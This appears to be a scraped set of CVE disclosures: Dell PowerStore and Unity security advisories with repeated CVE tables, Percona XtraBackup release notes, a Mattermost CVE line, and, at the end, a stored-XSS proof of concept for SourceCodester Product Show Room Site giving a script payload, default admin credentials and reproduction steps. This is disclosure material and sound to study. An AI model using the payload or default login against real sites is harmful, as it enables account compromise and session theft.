Dell PowerStore versions 2.0.0.x, 2.0.1.x and 2.1.0.x contains an open port vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to information disclosure and arbitrary code execution.

**Vaikutus**

Critical

**Tiedot**

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-22556

Dell PowerStore contains an Uncontrolled Resource Consumption Vulnerability in PowerStore User Interface. A remote unauthenticated attacker may potentially exploit this vulnerability, leading to the Denial of Service.

3.7

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2022-22557

Dell PowerStore contains Plain-Text Password Storage Vulnerability in version 2.0.0.x. and 2.0.1.x. A locally authenticated attacker may potentially exploit this vulnerability, leading to the disclosure of certain user credentials. The attacker may be able to use the exposed credentials to access the vulnerable application with privileges of the compromised account.

7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-26866

Dell PowerStore contains a Stored Cross-Site Scripting Vulnerability, an authenticated attacker may potentially exploit this vulnerability, leading to the storage of malicious HTML or JavaScript codes in a trusted application data store. When a victim user accesses the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable web application. Exploitation may lead to information disclosure, session theft, or client-side request forgery.

5.5

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N

CVE-2022-26867

Dell PowerStore contains formula injection vulnerability in which it supports the option to export data to either a CSV or an XLSX file. The data is taken as is, without any validation or sanitization. It may allow a malicious, authenticated user to inject payloads that might get interpreted as formulas by the corresponding spreadsheet application that is being used to open the CSV/XLSX file.

5.9

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

CVE-2022-26868

Dell PowerStore versions 2.0.0.x, 2.0.1.x and 2.1.0.x are vulnerable to a command injection flaw. An authenticated attacker may potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker.

6.4

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-26869

Dell PowerStore versions 2.0.0.x, 2.0.1.x and 2.1.0.x contain an open port vulnerability. A remote unauthenticated attacker may potentially exploit this vulnerability, leading to information disclosure, arbitrary code execution.

9.8

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2022-26870

Dell PowerStore versions 2.1.0.x contain an Authentication bypass vulnerability. A remote unauthenticated attacker may  potentially exploit this vulnerability when both Remote Secure Credential and External SSH are enabled. An attacker would gain “service” account access upon successful exploit.

7.0

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H

 

**Third-Party Component**

**CVEs**

**More Information**

NVMe SSD

CVE-2021-0148

Intel-SA-00535

Axios

CVE-2020-28168

See NVD (http://nvd.nist.gov/) for individual scores of each CVE.

bind-libs  
bind-libs-lite  
bind-utils  
bind-license

CVE-2021-25215

glib2

CVE-2021-27219

gupnp

CVE-2021-33516

java-1.8.0-openjdk

CVE-2021-2369

CVE-2021-2388

CVE-2021-2341

libldb

CVE-2021-20277

libwbclient

CVE-2021-20254

Lo-dash

CVE-2021-23337

CVE-2020-28500

CVE-2020-8203

Log4j

CVE-2021-45105

CVE-2021-44832

CVE-2022-23307

nettle

CVE-2021-20305

nss  
nss-sysinit  
nss-tools

CVE-2020-25648

openldap

CVE-2020-25692

pillow

CVE-2021-28675

CVE-2021-28676

CVE-2021-25288

CVE-2021-25287

CVE-2021-28677

CVE-2021-28678

postgres

CVE-2021-20229

CVE-2021-32027

CVE-2021-3393

postgres-libs

CVE-2021-32027

postgresql-libs

CVE-2019-10208

CVE-2020-25694

CVE-2020-25695

samba-common  
samba-client-libs  
samba-common-libs libwbclient

CVE-2021-20254

screen version

CVE-2021-26937

urllib3

CVE-2021-33503

xterm

CVE-2021-27135

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-22556

Dell PowerStore contains an Uncontrolled Resource Consumption Vulnerability in PowerStore User Interface. A remote unauthenticated attacker may potentially exploit this vulnerability, leading to the Denial of Service.

3.7

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2022-22557

Dell PowerStore contains Plain-Text Password Storage Vulnerability in version 2.0.0.x. and 2.0.1.x. A locally authenticated attacker may potentially exploit this vulnerability, leading to the disclosure of certain user credentials. The attacker may be able to use the exposed credentials to access the vulnerable application with privileges of the compromised account.

7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-26866

Dell PowerStore contains a Stored Cross-Site Scripting Vulnerability, an authenticated attacker may potentially exploit this vulnerability, leading to the storage of malicious HTML or JavaScript codes in a trusted application data store. When a victim user accesses the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable web application. Exploitation may lead to information disclosure, session theft, or client-side request forgery.

5.5

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N

CVE-2022-26867

Dell PowerStore contains formula injection vulnerability in which it supports the option to export data to either a CSV or an XLSX file. The data is taken as is, without any validation or sanitization. It may allow a malicious, authenticated user to inject payloads that might get interpreted as formulas by the corresponding spreadsheet application that is being used to open the CSV/XLSX file.

5.9

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

CVE-2022-26868

Dell PowerStore versions 2.0.0.x, 2.0.1.x and 2.1.0.x are vulnerable to a command injection flaw. An authenticated attacker may potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker.

6.4

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-26869

Dell PowerStore versions 2.0.0.x, 2.0.1.x and 2.1.0.x contain an open port vulnerability. A remote unauthenticated attacker may potentially exploit this vulnerability, leading to information disclosure, arbitrary code execution.

9.8

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2022-26870

Dell PowerStore versions 2.1.0.x contain an Authentication bypass vulnerability. A remote unauthenticated attacker may  potentially exploit this vulnerability when both Remote Secure Credential and External SSH are enabled. An attacker would gain “service” account access upon successful exploit.

7.0

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H

 

**Third-Party Component**

**CVEs**

**More Information**

NVMe SSD

CVE-2021-0148

Intel-SA-00535

Axios

CVE-2020-28168

See NVD (http://nvd.nist.gov/) for individual scores of each CVE.

bind-libs  
bind-libs-lite  
bind-utils  
bind-license

CVE-2021-25215

glib2

CVE-2021-27219

gupnp

CVE-2021-33516

java-1.8.0-openjdk

CVE-2021-2369

CVE-2021-2388

CVE-2021-2341

libldb

CVE-2021-20277

libwbclient

CVE-2021-20254

Lo-dash

CVE-2021-23337

CVE-2020-28500

CVE-2020-8203

Log4j

CVE-2021-45105

CVE-2021-44832

CVE-2022-23307

nettle

CVE-2021-20305

nss  
nss-sysinit  
nss-tools

CVE-2020-25648

openldap

CVE-2020-25692

pillow

CVE-2021-28675

CVE-2021-28676

CVE-2021-25288

CVE-2021-25287

CVE-2021-28677

CVE-2021-28678

postgres

CVE-2021-20229

CVE-2021-32027

CVE-2021-3393

postgres-libs

CVE-2021-32027

postgresql-libs

CVE-2019-10208

CVE-2020-25694

CVE-2020-25695

samba-common  
samba-client-libs  
samba-common-libs libwbclient

CVE-2021-20254

screen version

CVE-2021-26937

urllib3

CVE-2021-33503

xterm

CVE-2021-27135

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

**CVEs Addressed**

**Products**

**Affected Versions**

**Updated Versions**

**Link to Update**

CVE-2022-22557

PowerStore T OS  
PowerStore X OS

PowerStore T OS versions 2.0.0.x and 2.0.1.x  
\*PowerStore T OS versions 1.0.x.x are not affected.

PowerStore X OS versions 2.0.0.x and 2.0.1.x  
\*PowerStore X OS versions 1.0.x.x are not affected.

PowerStore T OS Upgrade 2.1.0.0-1561821

PowerStore T OS Upgrade 2.1.0.1-1602345

PowerStore T OS Upgrade 2.1.1.0-1649887

PowerStore X OS Upgrade 2.1.1.0-1649887

https://www.dell.com/support/home/?app=drivers

CVE-2022-22556

PowerStore T OS  
PowerStore X OS

PowerStore T OS versions before PowerStore T OS Upgrade 2.1.0.0-1561821

PowerStore X OS versions before PowerStore X OS Upgrade 2.1.1.0-1649887

PowerStore T OS Upgrade 2.1.0.0-1561821

PowerStore T OS Upgrade 2.1.0.1-1602345

PowerStore T OS Upgrade 2.1.1.0-1649887

PowerStore X OS”  
PowerStore X OS Upgrade 2.1.1.0-1649887

CVE-2021-0148

CVE-2020-28168

CVE-2021-25215

CVE-2021-27219

CVE-2021-33516

CVE-2021-2369

CVE-2021-2388

CVE-2021-2341

CVE-2021-20277

CVE-2021-20254

CVE-2021-23337

CVE-2020-28500

CVE-2020-8203

CVE-2020-25692

CVE-2021-28675

CVE-2021-28676

CVE-2021-25288

CVE-2021-25287

CVE-2021-28677

CVE-2021-28678

CVE-2021-20229

CVE-2021-32027

CVE-2021-3393

CVE-2019-10208

CVE-2020-25694

CVE-2020-25695

CVE-2021-20254

CVE-2021-26937

CVE-2021-33503

CVE-2021-27135

CVE-2022-26867

PowerStore T OS  
PowerStore X OS

PowerStore T OS versions before PowerStore T OS Upgrade 2.1.1.0-1649887

PowerStore X OS versions before PowerStore X OS Upgrade 2.1.1.0-1649887

PowerStore T OS Upgrade 2.1.1.0-1649887

PowerStore X OS Upgrade 2.1.1.0-1649887

CVE-2022-26867

CVE-2021-45105

CVE-2021-44832

CVE-2022-23307

CVE-2022-26868

PowerStore T OS  
PowerStore X OS

PowerStore T OS versions 2.0.0.x, 2.0.1.x and 2.1.0.x  
\*PowerStore T OS versions 1.0.x.x are not affected.

PowerStore X OS versions 2.0.0.x, 2.0.1.x and 2.1.0.x  
\*PowerStore X OS versions 1.0.x.x are not affected.

PowerStore T OS Upgrade 2.1.1.0-1649887

PowerStore X OS Upgrade 2.1.1.0-1649887

CVE-2022-26869

CVE-2022-26870

PowerStore T OS

PowerStore T OS versions 2.1.0.x  
\*PowerStore T OS 1.0.x.x, 2.0.0.x, 2.0.1.x are not affected

PowerStore T OS Upgrade 2.1.1.0-1649887  
 

**CVEs Addressed**

**Products**

**Affected Versions**

**Updated Versions**

**Link to Update**

CVE-2022-22557

PowerStore T OS  
PowerStore X OS

PowerStore T OS versions 2.0.0.x and 2.0.1.x  
\*PowerStore T OS versions 1.0.x.x are not affected.

PowerStore X OS versions 2.0.0.x and 2.0.1.x  
\*PowerStore X OS versions 1.0.x.x are not affected.

PowerStore T OS Upgrade 2.1.0.0-1561821

PowerStore T OS Upgrade 2.1.0.1-1602345

PowerStore T OS Upgrade 2.1.1.0-1649887

PowerStore X OS Upgrade 2.1.1.0-1649887

https://www.dell.com/support/home/?app=drivers

CVE-2022-22556

PowerStore T OS  
PowerStore X OS

PowerStore T OS versions before PowerStore T OS Upgrade 2.1.0.0-1561821

PowerStore X OS versions before PowerStore X OS Upgrade 2.1.1.0-1649887

PowerStore T OS Upgrade 2.1.0.0-1561821

PowerStore T OS Upgrade 2.1.0.1-1602345

PowerStore T OS Upgrade 2.1.1.0-1649887

PowerStore X OS”  
PowerStore X OS Upgrade 2.1.1.0-1649887

CVE-2021-0148

CVE-2020-28168

CVE-2021-25215

CVE-2021-27219

CVE-2021-33516

CVE-2021-2369

CVE-2021-2388

CVE-2021-2341

CVE-2021-20277

CVE-2021-20254

CVE-2021-23337

CVE-2020-28500

CVE-2020-8203

CVE-2020-25692

CVE-2021-28675

CVE-2021-28676

CVE-2021-25288

CVE-2021-25287

CVE-2021-28677

CVE-2021-28678

CVE-2021-20229

CVE-2021-32027

CVE-2021-3393

CVE-2019-10208

CVE-2020-25694

CVE-2020-25695

CVE-2021-20254

CVE-2021-26937

CVE-2021-33503

CVE-2021-27135

CVE-2022-26867

PowerStore T OS  
PowerStore X OS

PowerStore T OS versions before PowerStore T OS Upgrade 2.1.1.0-1649887

PowerStore X OS versions before PowerStore X OS Upgrade 2.1.1.0-1649887

PowerStore T OS Upgrade 2.1.1.0-1649887

PowerStore X OS Upgrade 2.1.1.0-1649887

CVE-2022-26867

CVE-2021-45105

CVE-2021-44832

CVE-2022-23307

CVE-2022-26868

PowerStore T OS  
PowerStore X OS

PowerStore T OS versions 2.0.0.x, 2.0.1.x and 2.1.0.x  
\*PowerStore T OS versions 1.0.x.x are not affected.

PowerStore X OS versions 2.0.0.x, 2.0.1.x and 2.1.0.x  
\*PowerStore X OS versions 1.0.x.x are not affected.

PowerStore T OS Upgrade 2.1.1.0-1649887

PowerStore X OS Upgrade 2.1.1.0-1649887

CVE-2022-26869

CVE-2022-26870

PowerStore T OS

PowerStore T OS versions 2.1.0.x  
\*PowerStore T OS 1.0.x.x, 2.0.0.x, 2.0.1.x are not affected

PowerStore T OS Upgrade 2.1.1.0-1649887  
 

**Versiohistoria****Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

Tämän Dell Technologiesin tietoturvatiedotteen tiedot on luettava, ja niiden avulla voidaan välttää tilanteita, jotka voivat johtua tässä kuvatuista ongelmista. Dell Technologiesin tietoturvatiedotteet tuovat tärkeitä tietoturvatietoja haavoittuvuudelle alttiiden tuotteiden käyttäjien tietoon. Dell Technologies arvioi riskin perustuen asennettujen järjestelmien hajautetun joukon keskimääräisiin riskeihin, eikä se välttämättä vastaa paikallisen asennuksen ja yksittäisen ympäristön todellista riskiä. Suositus on, että kaikki käyttäjät ratkaisevat näiden tietojen sovellettavuuden yksittäisten ympäristöjen mukaan ja ryhtyvät tarvittaviin toimenpiteisiin. Tässä esitetyt tiedot annetaan "sellaisenaan" ilman minkäänlaista takuuta. Dell Technologies kiistää kaikki suorat tai epäsuorat takuut, mukaan lukien takuut soveltuvuudesta kaupankäynnin kohteeksi, sopivuudesta tiettyyn käyttötarkoitukseen, omistusoikeudesta ja loukkaamattomuudesta. Dell Technologies, sen tytäryhtiöt tai toimittajat eivät missään tilanteessa ole vastuussa mistään vahingoista, jotka johtuvat tässä asiakirjassa mainituista tiedoista tai toimenpiteistä, joihin käyttäjä päättää ryhtyä. Tämä koskee kaikkia suoria, epäsuoria, satunnaisia, välillisiä, liikevoiton menetykseen liittyviä tai erityisluontoisia vahinkoja, vaikka Dell Technologies tai sen tytäryhtiöt tai toimittajat olisivat saaneet tiedon tällaisten vahinkojen mahdollisuudesta. Jotkin osavaltiot eivät salli satunnaisten tai seuraamuksellisten vahinkojen vastuun poistamista tai rajoittamista, joten edellä mainittua rajoitusta sovelletaan vain lain sallimassa laajuudessa.

PowerStore, PowerStore 1000X, PowerStore 1000T, PowerStore 3000X, PowerStore 3000T, PowerStore 5000X, PowerStore 5000T, PowerStore 500T, PowerStore 7000X, PowerStore 7000T, PowerStore 9000X, PowerStore 9000T, Product Security Information

21 huhtik. 2022

CVE-2022-26869: DSA-2022-014: Dell EMC PowerStore Family Security Update for Multiple Vulnerabilities

Dell Unity, Dell UnityVSA, and Dell Unity XT versions prior to 5.2.0.0.5.173 contain a plain-text password storage vulnerability when certain off-array tools are run on the system. The credentials of a user with high privileges are stored in plain text. A local malicious user with high privileges may use the exposed password to gain access with the privileges of the compromised user.

Artikkelin numero: 000199050

**Yhteenveto: Dell Unity, Dell UnityVSA, and Dell Unity XT remediation is available for multiple security vulnerabilities that may be exploited by malicious users to compromise the affected system.**

*   Artikkelin sisältö
*   Juridiset tiedot
*   Artikkelin ominaisuudet
*   Arvostele tämä artikkeli

**Artikkelin sisältö**

**Vaikutus**

Critical

**Tiedot**

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-29084

Dell Unity, Dell UnityVSA, and Dell Unity XT versions before 5.2.0.0.5.173 do not restrict excessive authentication attempts in Unisphere GUI. A remote unauthenticated attacker may potentially exploit this vulnerability to brute-force passwords and gain access to the system as the victim. Account takeover is possible if weak passwords are used by users.

8.1

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2022-29085

Dell Unity, Dell UnityVSA, and Dell Unity XT versions before 5.2.0.0.5.173 contain a plain-text password storage vulnerability when certain off-array tools are run on the system. The credentials of a user with high privileges are stored in plain text. A local malicious user with high privileges may use the exposed password to gain access with the privileges of the compromised user.

6.4

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

 

**Third-party Component**

**CVEs**

**More Information**

aide

CVE-2021-45417

See NVD (http://nvd.nist.gov/) for individual scores for each CVE.  
 

apache2

CVE-2021-33193

CVE-2021-34798

CVE-2021-36160

CVE-2021-39275

CVE-2021-40438

CVE-2022-22719

CVE-2022-22720

CVE-2022-22721

CVE-2022-23943

Apache-tomcat

CVE-2021-25122

CVE-2021-25329

CVE-2021-30639

CVE-2021-30640

CVE-2021-33037

CVE-2021-41079

CVE-2021-42340

avahi

CVE-2021-3468

cyrus-sasl

CVE-2022-24407

Dell BSAFE™ Micro Edition Suite

CVE-2020-5359

See Dell KB DSA-2020-114: https://www.dell.com/support/kbdoc/en-us/000181098/dsa-2020-114-dell-bsafe-micro-edition-suite-multiple-security-vulnerabilities for individual scores for each CVE.

CVE-2020-5360

docker, containerd, runc

CVE-2021-30465

See NVD (http://nvd.nist.gov/) for individual scores for each CVE.

CVE-2021-32760

CVE-2021-41089

CVE-2021-41091

CVE-2021-41092

CVE-2021-41103

expat

CVE-2021-45960

CVE-2021-46143

CVE-2022-22822

CVE-2022-22823

CVE-2022-22824

CVE-2022-22825

CVE-2022-22826

CVE-2022-22827

CVE-2022-23852

CVE-2022-23990

CVE-2022-25235

CVE-2022-25236

CVE-2022-25313

CVE-2022-25314

CVE-2022-25315

glibc

CVE-2021-33574

CVE-2021-35942

json-c

CVE-2020-12762

kernel

CVE-2021-40490

libesmtp

CVE-2019-19977

net-snmp

CVE-2018-18065

CVE-2020-15862

openssl (Unisphere UI)

CVE-2022-0778

p11-kit

CVE-2020-29361

polkit

CVE-2021-4034

python3

CVE-2021-3426

CVE-2021-3733

CVE-2021-3737

sqlite3

CVE-2015-3414

CVE-2015-3415

CVE-2019-19244

CVE-2019-19317

CVE-2019-19603

CVE-2019-19645

CVE-2019-19646

CVE-2019-19880

CVE-2019-19923

CVE-2019-19924

CVE-2019-19925

CVE-2019-19926

CVE-2019-19959

CVE-2019-20218

CVE-2020-13434

CVE-2020-13435

CVE-2020-13630

CVE-2020-13631

CVE-2020-13632

CVE-2020-15358

CVE-2020-9327

tcpdump

CVE-2018-16301

tiff

CVE-2017-17095

CVE-2019-17546

CVE-2020-19131

CVE-2020-35521

CVE-2020-35522

CVE-2020-35523

CVE-2020-35524

CVE-2022-22844

ucode-intel

CVE-2020-24489

CVE-2020-24511

CVE-2020-24512

CVE-2020-24513

CVE-2021-0127

CVE-2021-0145

CVE-2021-0146

CVE-2021-33120

vim

CVE-2021-3778

CVE-2021-3796

CVE-2021-3872

CVE-2021-3927

CVE-2021-3928

CVE-2021-3984

CVE-2021-4019

CVE-2021-4193

CVE-2021-46059

CVE-2022-0319

CVE-2022-0351

CVE-2022-0361

CVE-2022-0413

xerces-s

CVE-2018-1311

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-29084

Dell Unity, Dell UnityVSA, and Dell Unity XT versions before 5.2.0.0.5.173 do not restrict excessive authentication attempts in Unisphere GUI. A remote unauthenticated attacker may potentially exploit this vulnerability to brute-force passwords and gain access to the system as the victim. Account takeover is possible if weak passwords are used by users.

8.1

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2022-29085

Dell Unity, Dell UnityVSA, and Dell Unity XT versions before 5.2.0.0.5.173 contain a plain-text password storage vulnerability when certain off-array tools are run on the system. The credentials of a user with high privileges are stored in plain text. A local malicious user with high privileges may use the exposed password to gain access with the privileges of the compromised user.

6.4

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

 

**Third-party Component**

**CVEs**

**More Information**

aide

CVE-2021-45417

See NVD (http://nvd.nist.gov/) for individual scores for each CVE.  
 

apache2

CVE-2021-33193

CVE-2021-34798

CVE-2021-36160

CVE-2021-39275

CVE-2021-40438

CVE-2022-22719

CVE-2022-22720

CVE-2022-22721

CVE-2022-23943

Apache-tomcat

CVE-2021-25122

CVE-2021-25329

CVE-2021-30639

CVE-2021-30640

CVE-2021-33037

CVE-2021-41079

CVE-2021-42340

avahi

CVE-2021-3468

cyrus-sasl

CVE-2022-24407

Dell BSAFE™ Micro Edition Suite

CVE-2020-5359

See Dell KB DSA-2020-114: https://www.dell.com/support/kbdoc/en-us/000181098/dsa-2020-114-dell-bsafe-micro-edition-suite-multiple-security-vulnerabilities for individual scores for each CVE.

CVE-2020-5360

docker, containerd, runc

CVE-2021-30465

See NVD (http://nvd.nist.gov/) for individual scores for each CVE.

CVE-2021-32760

CVE-2021-41089

CVE-2021-41091

CVE-2021-41092

CVE-2021-41103

expat

CVE-2021-45960

CVE-2021-46143

CVE-2022-22822

CVE-2022-22823

CVE-2022-22824

CVE-2022-22825

CVE-2022-22826

CVE-2022-22827

CVE-2022-23852

CVE-2022-23990

CVE-2022-25235

CVE-2022-25236

CVE-2022-25313

CVE-2022-25314

CVE-2022-25315

glibc

CVE-2021-33574

CVE-2021-35942

json-c

CVE-2020-12762

kernel

CVE-2021-40490

libesmtp

CVE-2019-19977

net-snmp

CVE-2018-18065

CVE-2020-15862

openssl (Unisphere UI)

CVE-2022-0778

p11-kit

CVE-2020-29361

polkit

CVE-2021-4034

python3

CVE-2021-3426

CVE-2021-3733

CVE-2021-3737

sqlite3

CVE-2015-3414

CVE-2015-3415

CVE-2019-19244

CVE-2019-19317

CVE-2019-19603

CVE-2019-19645

CVE-2019-19646

CVE-2019-19880

CVE-2019-19923

CVE-2019-19924

CVE-2019-19925

CVE-2019-19926

CVE-2019-19959

CVE-2019-20218

CVE-2020-13434

CVE-2020-13435

CVE-2020-13630

CVE-2020-13631

CVE-2020-13632

CVE-2020-15358

CVE-2020-9327

tcpdump

CVE-2018-16301

tiff

CVE-2017-17095

CVE-2019-17546

CVE-2020-19131

CVE-2020-35521

CVE-2020-35522

CVE-2020-35523

CVE-2020-35524

CVE-2022-22844

ucode-intel

CVE-2020-24489

CVE-2020-24511

CVE-2020-24512

CVE-2020-24513

CVE-2021-0127

CVE-2021-0145

CVE-2021-0146

CVE-2021-33120

vim

CVE-2021-3778

CVE-2021-3796

CVE-2021-3872

CVE-2021-3927

CVE-2021-3928

CVE-2021-3984

CVE-2021-4019

CVE-2021-4193

CVE-2021-46059

CVE-2022-0319

CVE-2022-0351

CVE-2022-0361

CVE-2022-0413

xerces-s

CVE-2018-1311

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen****Versiohistoria**

**Revision**

**Date**

**More Informatio**n

1.0

2022-04-29

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

**Juridiset tiedot**

Tämän Dell Technologiesin tietoturvatiedotteen tiedot on luettava, ja niiden avulla voidaan välttää tilanteita, jotka voivat johtua tässä kuvatuista ongelmista. Dell Technologiesin tietoturvatiedotteet tuovat tärkeitä tietoturvatietoja haavoittuvuudelle alttiiden tuotteiden käyttäjien tietoon. Dell Technologies arvioi riskin perustuen asennettujen järjestelmien hajautetun joukon keskimääräisiin riskeihin, eikä se välttämättä vastaa paikallisen asennuksen ja yksittäisen ympäristön todellista riskiä. Suositus on, että kaikki käyttäjät ratkaisevat näiden tietojen sovellettavuuden yksittäisten ympäristöjen mukaan ja ryhtyvät tarvittaviin toimenpiteisiin. Tässä esitetyt tiedot annetaan "sellaisenaan" ilman minkäänlaista takuuta. Dell Technologies kiistää kaikki suorat tai epäsuorat takuut, mukaan lukien takuut soveltuvuudesta kaupankäynnin kohteeksi, sopivuudesta tiettyyn käyttötarkoitukseen, omistusoikeudesta ja loukkaamattomuudesta. Dell Technologies, sen tytäryhtiöt tai toimittajat eivät missään tilanteessa ole vastuussa mistään vahingoista, jotka johtuvat tässä asiakirjassa mainituista tiedoista tai toimenpiteistä, joihin käyttäjä päättää ryhtyä. Tämä koskee kaikkia suoria, epäsuoria, satunnaisia, välillisiä, liikevoiton menetykseen liittyviä tai erityisluontoisia vahinkoja, vaikka Dell Technologies tai sen tytäryhtiöt tai toimittajat olisivat saaneet tiedon tällaisten vahinkojen mahdollisuudesta. Jotkin osavaltiot eivät salli satunnaisten tai seuraamuksellisten vahinkojen vastuun poistamista tai rajoittamista, joten edellä mainittua rajoitusta sovelletaan vain lain sallimassa laajuudessa.

**Artikkelin ominaisuudet**

**Tuote, johon asia vaikuttaa**

Dell EMC Unity 300, Dell EMC Unity 300F, Dell EMC Unity 350F, Dell EMC Unity 400, Dell EMC Unity 400F, Dell EMC Unity 450F, Dell EMC Unity 500, Dell EMC Unity 500F, Dell EMC Unity 550F, Dell EMC Unity 600

**Tuote**

Product Security Information, Dell EMC Unity 600F, Dell EMC Unity 650F, Dell EMC Unity XT 680, Dell EMC Unity XT 680F, Dell EMC Unity XT 880, Dell EMC Unity XT 880F, Dell EMC UnityVSA (Virtual Storage Appliance)

**Edellinen julkaisupäivä**

29 huhtik. 2022

**Versio**

1

**Artikkelin tyyppi**

Dell Security Advisory

CVE-2022-29085: DSA-2022-021: Dell Unity, Dell UnityVSA, and Dell Unity XT Security Update for Multiple Vulnerabilities

Percona XtraBackup 2.4.20 unintentionally writes the command line to any resulting backup file output. This may include sensitive arguments passed at run time. In addition, when --history is passed at run time, this command line is also written to the PERCONA_SCHEMA.xtrabackup_history table. NOTE: this issue exists because of an incomplete fix for CVE-2020-10997.

Date

April 26, 2022

Percona XtraBackup for MySQL Databases enables MySQL backups without blocking user queries. Percona XtraBackup is ideal for companies with large data sets and mission-critical applications that cannot tolerate long periods of downtime. Offered free as an open source solution, Percona XtraBackup drives down backup costs while providing unique features for MySQL backups.

Percona XtraBackup 2.4 does not support making backups of databases created in _MySQL 8.0_, _Percona Server for MySQL 8.0_, or _Percona XtraDB Cluster 8.0_. Use Percona XtraBackup 8.0 to make backups for these versions.

*   Release Highlights
    
*   New Features
    
*   Bugs Fixed
    
*   Useful Links
    

**Release Highlights¶**

The xbcloud binary adds support for the Microsoft Azure Cloud Storage using the REST API.

**New Features¶**

*   PXB-1883: Implements support for Microsoft Azure Cloud Storage in the xbcloud binary. (Thanks to Ivan Groenewold for reporting this issue)
    

**Bugs Fixed¶**

*   PXB-2608: Upgraded the Vault API to V2 (Thanks to Benedito Marques Magalhaes for reporting this issue)
    
*   PXB-2649: Fix for compilation issues on GCC-10.
    
*   PXB-2648: CURL prior to 7.38.0 version doesn’t use CURLE\_HTTP2 and throws an error 'CURLE_HTTP2' is not a member of 'CURLcode'. Added CURLE\_OBSOLETE16 as a connectivity error code. In CURL versions after 7.38.0, CURLE\_OBSOLETE16 is translated to CURLE\_HTTP2.
    
*   PXB-2711: Fix for libgcrypt initialization warnings in xtrabackup.
    
*   PXB-2722: Fix for when via command line, a password, passed using the -p option, was written into the backup tool\_command in xtrabackup\_info.
    

**Useful Links¶**

*   The Percona XtraBackup installation instructions
    
*   The Percona XtraBackup downloads
    
*   The Percona XtraBackup GitHub location
    
*   To contribute to the documentation, review the Documentation Contribution Guide

CVE-2022-26944: Percona XtraBackup 2.4.25 — Percona XtraBackup 2.4 Documentation

Uncontrolled resource consumption in Mattermost version 6.6.0 and earlier allows an authenticated attacker to crash the server via a crafted SVG attachment on a post.

CVE-2022-1982: Security Updates

A vulnerability was found in SourceCodester Product Show Room Site 1.0. It has been declared as problematic. This vulnerability affects p=contact. The manipulation of the Message textbox with the input <script>alert(1)</script> leads to cross site scripting. The attack can be initiated remotely but requires authentication. Exploit details have been disclosed to the public.

**Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)****Exploit Title: Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)****Exploit Author: webraybtl@webray.com.cn inc****Vendor Homepage: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html****Software Link: https://www.sourcecodester.com/download-code?nid=15370&title=Product+Show+Room+Site+in+PHP%2FOOP+Free+Source+Code****Version: Product Show Room Site 1.0****Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql****Description**

Persistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Product Show Room Site does not filter the content correctly at the "Contact info-Telephone" module, resulting in the generation of stored XSS.

**Payload used:**

<script>alert(111)</script>

**Proof of Concept**

1.  Login the CMS. Default Admin Access Username: admin Password: admin123
    
2.  Open Page http://172.24.5.107/psrs/?p=contact
    
3.  Put XSS payload (<script>alert(111)</script>) in the Message box and click on Send Message to publish the page  
    
4.  Open http://172.24.5.107/psrs/admin/?page=inquiries,Viewing the Top 1 of Inquiries page,We can see the alert.

